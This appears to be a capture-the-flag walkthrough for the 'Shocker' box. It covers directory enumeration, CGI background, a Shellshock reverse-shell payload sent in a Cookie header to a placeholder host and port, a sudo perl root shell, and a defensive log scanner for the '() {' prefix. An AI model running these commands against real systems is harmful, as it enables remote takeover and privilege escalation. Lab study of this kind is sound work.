shocker

Shocker shellshock

The Apache Server header and the SSH version banner both give away the Ubuntu version.

Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 16.04. https://packages.ubuntu.com/search?keywords=openssh-server https://packages.ubuntu.com/search?keywords=apache2

Open the site in a browser and view the page source. gobuster does not reveal the sensitive directory because it does not append a trailing slash to wordlist entries. dirb and dirsearch automatically add a slash for directories in the wordlist, but that doubles the number of attempts, so dirb will find it on the first go. To run gobuster instead, add the -f flag to look for directories, i.e. it simply adds a slash to each wordlist entry.

This finds a cgi-bin directory.

What is CGI? Let's configure our own CGI on an Apache server: how to enable/disable CGI for Apache, write your own CGI script, configure CGI.

Learning Apache http server - Executing CGI scripts - YouTube https://www.youtube.com/watch?v=aWWK5tqvuyg

Lecture -19 CGI Scripts - YouTube https://www.youtube.com/watch?v=cP1fN6xf3nI

Common gateway interface|CGI bin - YouTube https://www.youtube.com/watch?v=rRnMLwj5GWk

Common Gateway Interface(CGI) || working process of Common Gateway Interface - YouTube https://www.youtube.com/watch?v=cKckh5pD7VI

Create first cgi script - YouTube https://www.youtube.com/watch?v=XBnGTXDu9gc

How To Enable or Disable CGI Scripts in Apache - YouTube https://www.youtube.com/watch?v=Wr2IVt9X-zY

Run a recursive scan inside this directory looking for common CGI scripts.

CGI defines how information/communication passes between the browser and the server.

It is used for creating pages dynamically.

Shellshock is a bug in bash, in old versions of bash to be precise. Shellshock Code & the Bash Bug - Computerphile https://www.youtube.com/watch?v=MyldPMn95kk

└─$ gobuster dir -o gobust-cgi.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -x sh,pl,cgi

nmap -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=echo\;/bin/ls 10.10.10.56

Reverse shell: bash one-liner reverse shell sent in the Cookie header
Cookie: () { :;}; echo; /bin/bash -i >& /dev/tcp/ip/port 0>&1
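
Added example, not part of the original notes: a defender-side check for the header payload above. It scans Apache access-log fields for the "() {" function-definition prefix that a vulnerable bash imports from CGI environment variables. The LogFormat (combined plus %{Cookie}i), the sample log lines and the name find_shellshock are assumptions constructed for illustration.

```python
import re

# Vulnerable bash treats an environment value beginning with "() {" as a
# function definition; CGI copies request headers into the environment.
FUNC_PREFIX = re.compile(r"\(\s*\)\s*\{")
# Quoted fields of an access-log line; Apache escapes embedded quotes as \".
QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Assumed LogFormat: combined plus the Cookie header, which the default
# combined format does not record:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i" "%{Cookie}i"
FIELDS = ("request", "referer", "user-agent", "cookie")


def find_shellshock(lines):
    """Return (client_ip, path, field) for each logged field carrying '() {'."""
    hits = []
    for line in lines:
        quoted = QUOTED.findall(line)
        if len(quoted) < len(FIELDS):
            continue  # not in the assumed format; skip rather than guess
        client = line.split(" ", 1)[0]
        parts = quoted[0].split(" ")
        path = parts[1] if len(parts) > 1 else ""
        for name, value in zip(FIELDS, quoted):
            if FUNC_PREFIX.search(value):
                hits.append((client, path, name))
    return hits


# Constructed sample lines (documentation addresses, harmless echo payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0" "-"',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 12 "-" "curl/7.88" "() { :;}; echo; echo probe"',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 12 "-" "() { :; }; echo; echo probe" "-"',
    '192.0.2.77 - - [01/Jan/2024:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux)" "-"',
]

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit)
```

With the stock combined LogFormat the Cookie header is not logged, so a payload sent only in that header leaves no trace in the access log.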

Privilege escalation:
sudo /usr/bin/perl -e 'exec("/bin/bash")'
